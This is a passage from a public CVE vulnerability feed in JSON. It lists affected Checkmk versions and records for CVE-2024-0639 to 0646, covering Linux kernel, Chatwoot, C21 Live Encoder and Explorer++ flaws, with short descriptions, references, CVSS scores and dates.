"cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p12:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p13:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p14:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p15:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p16:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p17:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p18:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p19:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p20:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p21:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p22:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p23:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p27:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p28:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p29:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p30:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p31:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p32:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p33:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p34:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p35:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p36:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p37:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p38:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p39:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p40:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.3.0:b1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 6.7, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-22T11:15Z", "lastModifiedDate" : "2024-12-04T17:00Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0639", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-667" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0639", "name" : "https://access.redhat.com/security/cve/CVE-2024-0639", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0639", "name" : "https://access.redhat.com/security/cve/CVE-2024-0639", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258754", "name" : "RHBZ#2258754", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258754", "name" : "RHBZ#2258754", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://github.com/torvalds/linux/commit/6feb37b3b06e9049e20dcf7e23998f92c9c5be9a", "name" : "https://github.com/torvalds/linux/commit/6feb37b3b06e9049e20dcf7e23998f92c9c5be9a", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/torvalds/linux/commit/6feb37b3b06e9049e20dcf7e23998f92c9c5be9a", "name" : "https://github.com/torvalds/linux/commit/6feb37b3b06e9049e20dcf7e23998f92c9c5be9a", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A denial of service vulnerability due to a deadlock was found in sctp_auto_asconf_init in net/sctp/socket.c in the Linux kernel’s SCTP subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionEndIncluding" : "6.4.16", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-17T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0640", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/chatwoot/chatwoot/commit/e39c14460b860d5e3d23d989dd6af48404ad1bb4", "name" : "https://github.com/chatwoot/chatwoot/commit/e39c14460b860d5e3d23d989dd6af48404ad1bb4", "refsource" : "", "tags" : [ ] }, { "url" : "https://huntr.com/bounties/08b3bebf-ce3c-4416-b75e-1927ba61de85", "name" : "https://huntr.com/bounties/08b3bebf-ce3c-4416-b75e-1927ba61de85", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A stored cross-site scripting (XSS) vulnerability exists in chatwoot/chatwoot versions 3.0.0 to 3.5.1. This vulnerability allows an admin user to inject malicious JavaScript code via the dashboard app settings, which can then be executed by another admin user when they access the affected dashboard app. The issue is fixed in version 3.5.2." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-03-20T10:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0641", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-667" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0641", "name" : "https://access.redhat.com/security/cve/CVE-2024-0641", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0641", "name" : "https://access.redhat.com/security/cve/CVE-2024-0641", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258757", "name" : "RHBZ#2258757", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258757", "name" : "RHBZ#2258757", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://github.com/torvalds/linux/commit/08e50cf071847323414df0835109b6f3560d44f5", "name" : "https://github.com/torvalds/linux/commit/08e50cf071847323414df0835109b6f3560d44f5", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/torvalds/linux/commit/08e50cf071847323414df0835109b6f3560d44f5", "name" : "https://github.com/torvalds/linux/commit/08e50cf071847323414df0835109b6f3560d44f5", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A denial of service vulnerability was found in tipc_crypto_key_revoke in net/tipc/crypto.c in the Linux kernel’s TIPC subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.6:rc1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.6:rc2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionEndExcluding" : "6.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.6:rc3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.6:rc4:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-17T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0642", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Inadequate access control in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to access the application as an administrator user through the application endpoint, due to lack of proper credential management." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cires21:live_encoder:5.3:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-17T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0643", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Unrestricted upload of dangerous file types in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to upload different file extensions without any restrictions, resulting in a full system compromise." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cires21:live_encoder:5.3:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-17T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0644", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-11T02:15Z", "lastModifiedDate" : "2025-02-11T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0645", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-120" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-explorer", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-explorer", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-explorer", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-explorer", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Buffer overflow vulnerability in Explorer++ affecting version 1.3.5.531. A local attacker could execute arbitrary code via a long filename argument by monitoring Structured Exception Handler (SEH) records." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:explorerplusplus:explorer\\+\\+:1.3.5.531:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-17T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0646", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0723", "name" : "RHSA-2024:0723", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0724", "name" : "RHSA-2024:0724", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0725", "name" : "RHSA-2024:0725", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0850", "name" : "RHSA-2024:0850", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0851", "name" : "RHSA-2024:0851", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0876", "name" : "RHSA-2024:0876", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0881", "name" : "RHSA-2024:0881", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0897", "name" : "RHSA-2024:0897", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1248", "name" : "RHSA-2024:1248", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1250", "name" : "RHSA-2024:1250", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1251", "name" : "RHSA-2024:1251", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1253", "name" : "RHSA-2024:1253", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1268", "name" : "RHSA-2024:1268", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1269", "name" : "RHSA-2024:1269", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1278", "name" : "RHSA-2024:1278", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1306", "name" : "RHSA-2024:1306", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1367", "name" : "RHSA-2024:1367", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1368", "name" : "RHSA-2024:1368", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1377", "name" : "RHSA-2024:1377", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1382", "name" : "RHSA-2024:1382", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1404", "name" : "RHSA-2024:1404", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2094", "name" : "RHSA-2024:2094", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0646", "name" : "https://access.redhat.com/security/cve/CVE-2024-0646", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2253908", "name" : "RHBZ#2253908", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267", "name" : "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267", "name" : "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2253908", "name" : "RHBZ#2253908", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0646", "name" : "https://access.redhat.com/security/cve/CVE-2024-0646", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2094", "name" : "RHSA-2024:2094", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1404", "name" : "RHSA-2024:1404", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1382", "name" : "RHSA-2024:1382", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1377", "name" : "RHSA-2024:1377", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1368", "name" : "RHSA-2024:1368", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1367", "name" : "RHSA-2024:1367", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1306", "name" : "RHSA-2024:1306", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1278", "name" : "RHSA-2024:1278", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1269", "name" : "RHSA-2024:1269", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1268", "name" : "RHSA-2024:1268", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1253", "name" : "RHSA-2024:1253", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1251", "name" : "RHSA-2024:1251", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1250", "name" : "RHSA-2024:1250", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1248", "name" : "RHSA-2024:1248", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0897", "name" : "RHSA-2024:0897", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0881", "name" : "RHSA-2024:0881", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0876", "name" : "RHSA-2024:0876", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0851", "name" : "RHSA-2024:0851", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0850", "name" : "RHSA-2024:0850", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0725", "name" : "RHSA-2024:0725", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0724", "name" : "RHSA-2024:0724", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0723", "name" : "RHSA-2024:0723", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.2", "versionEndExcluding" : "6.6.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.11", "versionEndExcluding" : "5.15.147", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.5", "versionEndExcluding" : "5.10.208", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : 